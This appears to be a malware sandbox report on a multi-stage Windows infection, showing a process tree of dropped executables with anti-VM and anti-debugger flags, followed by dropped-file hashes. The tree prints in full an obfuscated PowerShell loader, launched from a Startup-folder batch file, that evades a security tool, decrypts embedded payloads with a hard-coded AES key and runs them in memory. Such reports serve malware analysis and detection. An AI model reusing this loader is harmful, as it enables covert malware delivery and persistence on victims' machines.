                                                                                                                  PID:540
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4676 /prefetch:8
                                                                                                                  9⤵
                                                                                                                    PID:5292
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4256,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4216 /prefetch:8
                                                                                                                    9⤵
                                                                                                                      PID:5344
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4728 /prefetch:8
                                                                                                                      9⤵
                                                                                                                        PID:2992
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8958839464321237659,2156541493775867695,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4900 /prefetch:8
                                                                                                                        9⤵
                                                                                                                          PID:5244
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 964
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:2968
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087616001\Bjkm5hE.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087616001\Bjkm5hE.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2856
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1087616001\Bjkm5hE.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1087616001\Bjkm5hE.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:5448
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 968
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:3620
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087618001\ZyE7LLF.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087618001\ZyE7LLF.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5440
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1087618001\ZyE7LLF.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1087618001\ZyE7LLF.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:5036
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 800
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:180
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087619001\91dbdd42f2.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087619001\91dbdd42f2.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5596
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087620001\DTQCxXZ.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087620001\DTQCxXZ.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:6676
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087621001\2431070801.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087621001\2431070801.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5204
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087622001\YMci4Rc.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087622001\YMci4Rc.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2016
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1087622001\YMci4Rc.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1087622001\YMci4Rc.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:3540
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 788
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:436
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:628
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:6396
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 804
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5828
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1087624001\NL58452.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1087624001\NL58452.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5260
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1087624001\NL58452.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1087624001\NL58452.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:5564
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 776
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:6400
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1087626041\tYliuwV.ps1"
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5484
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                                                                                                      7⤵
                                                                                                                        PID:2824
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                                                                                          8⤵
                                                                                                                            PID:4848
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            8⤵
                                                                                                                              PID:5676
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                                9⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:6708
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1087629001\oVpNTUm.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1087629001\oVpNTUm.exe"
                                                                                                                          6⤵
                                                                                                                            PID:6560
                                                                                                                • C:\ProgramData\hrwd\ergvtj.exe
                                                                                                                  C:\ProgramData\hrwd\ergvtj.exe start2
                                                                                                                  1⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Identifies Wine through registry keys
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:620
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                  1⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Identifies Wine through registry keys
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4436
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5040 -ip 5040
                                                                                                                  1⤵
                                                                                                                    PID:4756
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4136 -ip 4136
                                                                                                                    1⤵
                                                                                                                      PID:3028
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1896 -ip 1896
                                                                                                                      1⤵
                                                                                                                        PID:264
                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                        1⤵
                                                                                                                        • Blocklisted process makes network request
                                                                                                                        • Enumerates connected drives
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:964
                                                                                                                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                        1⤵
                                                                                                                          PID:4728
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6040 -ip 6040
                                                                                                                          1⤵
                                                                                                                            PID:1660
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2856 -ip 2856
                                                                                                                            1⤵
                                                                                                                              PID:5616
                                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                              1⤵
                                                                                                                                PID:5724
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5440 -ip 5440
                                                                                                                                1⤵
                                                                                                                                  PID:5624
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:5020
                                                                                                                                  • C:\ProgramData\hrwd\ergvtj.exe
                                                                                                                                    C:\ProgramData\hrwd\ergvtj.exe start2
                                                                                                                                    1⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:2468
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                    1⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:676
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2016 -ip 2016
                                                                                                                                    1⤵
                                                                                                                                      PID:6356
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 628 -ip 628
                                                                                                                                      1⤵
                                                                                                                                        PID:3004
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5260 -ip 5260
                                                                                                                                        1⤵
                                                                                                                                          PID:264

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\ProgramData\AFBAFBKE

                                                                                                                                          Filesize

                                                                                                                                          114KB

                                                                                                                                          MD5

                                                                                                                                          af4d3825d4098bd9c66faf64e20acdc8

                                                                                                                                          SHA1

                                                                                                                                          e205b61bd6e5f4d44bc36339fe3c207e52ee2f01

                                                                                                                                          SHA256

                                                                                                                                          095484268f554458404ca64d5c9f7b99abe0dbb1a75e056184047dc836f2e484

                                                                                                                                          SHA512

                                                                                                                                          71b4b99614e28a85925033f95d90e7c43f958b2284f7d7605d2ea896330efa9bba8b6d9550f62829daec3cf452e95c964ddb30cd9c7850bfa41a988792132e78

                                                                                                                                        • C:\ProgramData\DAAFIIJD

                                                                                                                                          Filesize

                                                                                                                                          116KB

                                                                                                                                          MD5

                                                                                                                                          f70aa3fa04f0536280f872ad17973c3d

                                                                                                                                          SHA1

                                                                                                                                          50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                                                          SHA256

                                                                                                                                          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                                                          SHA512

                                                                                                                                          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                                                        • C:\ProgramData\EHIDAKECFIEBGDHJEBKK

                                                                                                                                          Filesize

                                                                                                                                          9KB

                                                                                                                                          MD5

                                                                                                                                          cb1bd93132100e465d91fd96bfd87ca7

                                                                                                                                          SHA1

                                                                                                                                          b48802eac078d41f54d659186ee522d5ebd3ce2f

                                                                                                                                          SHA256

                                                                                                                                          f6a4a033d50aaf0f63b1afff83913481579c90312c23b8c10b417732546f875e

                                                                                                                                          SHA512

                                                                                                                                          3613760f4190b1c43e3766f8f54bc3ace1693a4f59187432e5181777c5622b1a0dda5a53c7888768f7005c9639d04e1402ed683cc3e89e4aaea1efd6ba7f6642

                                                                                                                                        • C:\ProgramData\Steam\Launcher\4pQJD3Zs5qbb\EN-Rkmdbdco\debug.log

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          5467a7fe01c97cb8bd98445bd60ff6c3

                                                                                                                                          SHA1

                                                                                                                                          3d6ccd7bb70299f231cad3b3955f5b7b96955e83

                                                                                                                                          SHA256

                                                                                                                                          fee492d248e476310b2c406363aae83fe5f907a8c0b9651a80433039b684c251

                                                                                                                                          SHA512

                                                                                                                                          d86a3e9124ff58197fa588c31181346082a1571acefbcc1354ab59baae5ac7d33f663bd96d7d240742b428d9b87fefba8970de3e2c1dc50a222bfcf368b6ee90

                                                                                                                                        • C:\ProgramData\b168q\ymg4oh4wt

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                          MD5

                                                                                                                                          a182561a527f929489bf4b8f74f65cd7

                                                                                                                                          SHA1

                                                                                                                                          8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                          SHA256

                                                                                                                                          42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                          SHA512

                                                                                                                                          9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                          Filesize

                                                                                                                                          593KB

                                                                                                                                          MD5

                                                                                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                          SHA1

                                                                                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                          SHA256

                                                                                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                          SHA512

                                                                                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                          Filesize

                                                                                                                                          40B

                                                                                                                                          MD5

                                                                                                                                          c96cc57b90192d16a3be1d7388e6764f

                                                                                                                                          SHA1

                                                                                                                                          b87df2922b9e84abd461747b4f7e1ba1efff96c1

                                                                                                                                          SHA256

                                                                                                                                          685d013a3a2768d25bd1342082c50ece9cf5c2c06892b23632c2b6e65d73b4b4

                                                                                                                                          SHA512

                                                                                                                                          dbdf108cbf25db919d91988cc1d3f919ceb466bb3a39e45f4bc52437055cdfa94eac1c63cb06528d4983725ba4ba1bc95c6bf8a18f3e8211cfbe9760ad3e8c78

                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\7b95831d-2eb8-4254-9110-0218315f8bf6.tmp

                                                                                                                                          Filesize

                                                                                                                                          1B

                                                                                                                                          MD5

                                                                                                                                          5058f1af8388633f609cadb75a75dc9d

                                                                                                                                          SHA1

                                                                                                                                          3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                          SHA256

                                                                                                                                          cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                          SHA512

                                                                                                                                          0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                          Filesize

                                                                                                                                          2B

                                                                                                                                          MD5

                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                          SHA1

                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                          SHA256

                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                          SHA512

                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                          SHA1

                                                                                                                                          445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                          SHA256

                                                                                                                                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                          SHA512

                                                                                                                                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\003ea59c-def2-4ceb-908f-8b58b7dcd9ce.dmp

                                                                                                                                          Filesize

                                                                                                                                          825KB

                                                                                                                                          MD5

                                                                                                                                          6356b9d054b8da1638cc86a7e5952758

                                                                                                                                          SHA1

                                                                                                                                          0b50c394b353d33e017b5b4b322aaa2928ca08b6

                                                                                                                                          SHA256

                                                                                                                                          15d093c2460efc3e688bf254c733c973a1bc5e59b79b8de4b15c37d570ec0be2

                                                                                                                                          SHA512

                                                                                                                                          0beab1fde7de44b60013d6b555bca5b078a2fa570130de1315d50d268f43ca6f6cc70a64621012283203ad72d30053dd91ddeabab8aa040a709f745a575cf875

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2b2ddd42-9374-4d52-972f-44abf8912e92.dmp

                                                                                                                                          Filesize

                                                                                                                                          825KB

                                                                                                                                          MD5

                                                                                                                                          7b66668a32d3a94e573cd7d7929c2ee4

                                                                                                                                          SHA1

                                                                                                                                          479f6a7588104ea40eca66fa010c10d23fec4eca

                                                                                                                                          SHA256

                                                                                                                                          a588e769a61f0d16b4d0c0b4e2d6ff85f160d35849d7884109a6a498f802782c

                                                                                                                                          SHA512

                                                                                                                                          e0644a01278d6d3bf2b7d1ab5ef81f3c34e7e057c6f2a0144e500be20bab1329d757a57f0ab41cc4b0393cdd331effb9c1b784066fc20ed824d171425f941cf9

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\32f234a8-3529-4446-84fe-52622271c342.dmp

                                                                                                                                          Filesize

                                                                                                                                          817KB

                                                                                                                                          MD5

                                                                                                                                          f51a7d6f8ed5978a6a446198c5a2f922

                                                                                                                                          SHA1

                                                                                                                                          6324316a7b1a9af789e8f5da55525ff02c9309fd

                                                                                                                                          SHA256

                                                                                                                                          29849ab84f357aab77e4aa56078af2612ab0f46eb6eaee7664479ed7ab47e415

                                                                                                                                          SHA512

                                                                                                                                          bf221c617b0003dff16348f89e0c366a46c0f86c7fbf7b28d5b8e4c99043a9399e1482d60782e0039f90685f08b904951a11f0619fabee76958a714adb593f77

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\352a55d0-fc24-4f79-a11f-9f9c9fb42867.dmp

                                                                                                                                          Filesize

                                                                                                                                          834KB

                                                                                                                                          MD5

                                                                                                                                          e577fc58d9bbcfe0d211d0f9d7037577

                                                                                                                                          SHA1

                                                                                                                                          f2f21be77bfe9e037050e3279ee9927da5144688

                                                                                                                                          SHA256

                                                                                                                                          8d0b7fa3ad206989f366ddfc8c85febd659dfaf27d90c2c0bf507e84690060ce

                                                                                                                                          SHA512

                                                                                                                                          a6d04a5bfd577ac29e0e4ba41d751efe498ef45cda50db660080ee38c560a0eee918bc7bc59fc38d38f979183ea504357a42d0af3c0518d0e44127b67c667eda

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3f51d5bc-336a-4549-b149-9deca721388d.dmp

                                                                                                                                          Filesize

                                                                                                                                          834KB

                                                                                                                                          MD5

                                                                                                                                          f1e4003f9218567efeb394f33c9f6ce2

                                                                                                                                          SHA1

                                                                                                                                          7d746b6c4566573333c1b75381b4ce3560473496

                                                                                                                                          SHA256

                                                                                                                                          f3244c3039a8f5d3ed828c35b29c66f2ac0dd5cd27cc6864b5b3d74598d2ddc6

                                                                                                                                          SHA512

                                                                                                                                          f57c1a3b67f407a1779654edf7385d2b956bec7c172103bf59d1e4e913fc1955a18b7e6dca1777794529fb09ae248fd4c7f6a529d1396920d9e0f24dc332345c

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9892a124-f477-47b2-b409-5a4feaaf3dcd.dmp

                                                                                                                                          Filesize

                                                                                                                                          834KB

                                                                                                                                          MD5

                                                                                                                                          c452614ce366153114adebdb37925653

                                                                                                                                          SHA1

                                                                                                                                          08253072f2e7d5c4fc6f3c5f0965a4c78c9b63e9

                                                                                                                                          SHA256

                                                                                                                                          7f1805246f5d9bcf309aad45c7bf845946d63149f7516c71b52afff6ddf975a7

                                                                                                                                          SHA512

                                                                                                                                          bab6d5f52f555e71891079d691c844ef7eb62d781b806e1216c1ffd0bf4152f64a0be96211037659cee489fe37b95e41934d32a43353df31a37c0e1d9d4ca348

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                          Filesize

                                                                                                                                          152B

                                                                                                                                          MD5

                                                                                                                                          fffde59525dd5af902ac449748484b15

                                                                                                                                          SHA1

                                                                                                                                          243968c68b819f03d15b48fc92029bf11e21bedc

                                                                                                                                          SHA256

                                                                                                                                          26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762

                                                                                                                                          SHA512

                                                                                                                                          f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                          Filesize

                                                                                                                                          152B

